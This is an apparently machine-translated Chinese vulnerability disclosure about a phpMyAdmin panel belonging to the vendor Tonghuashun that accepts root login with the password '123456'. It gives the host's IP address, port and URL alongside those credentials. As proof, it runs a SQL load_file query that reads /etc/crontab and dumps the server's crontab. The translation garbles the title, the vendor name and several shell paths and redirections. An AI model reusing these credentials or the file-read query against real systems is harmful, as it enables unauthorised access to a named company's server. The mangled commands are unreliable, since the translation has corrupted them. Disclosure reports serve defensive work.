漏洞标题 同花顺某phpMyAdmin存在root弱口令 相关厂商 同花顺 漏洞作者 路人甲 提交时间 2016-04-28 14:43 公开时间 2016-06-12 15:40 漏洞类型 后台弱口…
漏洞标题
root phpMyAdmin的直接密码
相关制造商
直冲
漏洞作者
过路人
提交时间
2016-04-28 14: 43
公共时间
2016-06-12 15: 40
漏洞类型
后台的密码很弱
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
密码强度低
漏洞详细信息
http://183.131.12.139: 81/phpmyadmin /
根
123456
/hxapp/hqserver/Straight Flush Quote服务器徽标
漏洞证明:
选择load_file('/etc/crontab');
SHELL=/斌/庆典
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=根
HOME=/
#有关详细信息,请参阅man 4 crontabs
#作业定义:的示例
#.----------------分钟(0 - 59)
#| .----------小时(0 - 23)
#| | .----------月中的某一天(1 - 31)
#| | | .-------月(1 - 12)或jan,feb,mar,apr ..
#| | | | .----星期几(0 - 6)(星期日=0或7)或太阳,星期一,星期二,星期五,星期四,星期五,坐
#| | | | |
#* * * * *要执行的用户名命令
*/5 * * * * root ntpdate ntp1.nl.net>/dev/null 2>& 1
*/3 8-16 * * 1-5 root sh /home/netstat/update_link_relation.sh>的/dev/NUL
*/1 * * * * root sh /home/l2log/update_log.sh>的/dev/NUL
*/1 8-16 * * 1-5 root sh /usr/local/nagios/var/processLog_cp.sh>的/dev/NUL
00 17 * * * root sh /home/lossreport/loss_report.sh>/dev/null 2>& 1
## 00 22 * * 1-5 root sh /home/arping/deal_arping_file.sh>/dev/null 2>& 1
*/1 * * * * root sh /home/netcheck/netcheck_log.sh>/dev/null 2>& 1
## */1 8-15 * * 1-5 root sh /home/netinfo/fpinglog_check.sh>的/dev/NUL
#* * * * * root flock -xn /usr/local/nagios/var/log_summary/log_summary.sh /usr/local/nagios/var/log_summary/log_summary.sh>> /tmp/a.txt 2> &安培; 1
#00 23 * * * root sh /usr/local/nagios/var/log_summary/nagioslog_backup/nagioslog_backup.sh>的/dev/null的
00 22 * * 1-5 root sh /home/switch_check/get_mac.sh>的/dev/NUL
25 17 * * 1-5 root sh /home/switch_check/get_mac.sh>的/dev/NUL
00 09 * * 1-5 root sh /home/switch_check/get_mac.sh>的/dev/NUL
*/5 22-23 * * 1-5 root sh /home/arping/arping.sh>的/dev/NUL
#*/1 * * * 1-5 root sh /home/check_loss/check_loss.sh>/dev/null 2>& 1
59 05 * * * root mv /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.6am
#*/1 * * * 1-5 root sh /home/add_realtime_task/add_realtime_task.sh>/dev/null 2>& 1
## 59 23 * * 0-6 root sh /home/netcheck/netcheck_db_back.sh>/dev/null
## 59 23 * * 0-6 root sh /home/netcheck/netstat_db_back.sh>/dev/null
#45 08 * * * root cp /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.am8045
## * * * * * root flock -xn /tmp/1.lock sh /tmp/1.sh
#*/5 * * * * root flock -xn /home/nagios/CheckNagios/SendMail_PollerError.sh sh /home/nagios/CheckNagios/SendMail_PollerError.sh
* * * * * root /usr/local/nagios/var/log_summary/poller_log_filter.sh
*/5 * * * * root sh /home/nagios/CheckNagios/checkNagiosProcess.sh
00 */2 * * * root sh /home/nagios/CheckNagios/checkDebugFile.sh
*/5 * * * 1-5 root sh /home/realtime_check/update_realtime.sh>/dev/null 2>& 1
*/30 * * * * root sh/usr/local/nagios/libexec/check_poller_disk>的/dev/null的
00 05 * * * root sh /hxapp/hqserver/bin/Sf_Disk.sh>/dev/null 2>& 1
修理计划:
版权声明:请注明出处。居民A @乌云
-
发表于 2016-07-17 08:00
- 阅读 ( 512 )
- 分类:黑客技术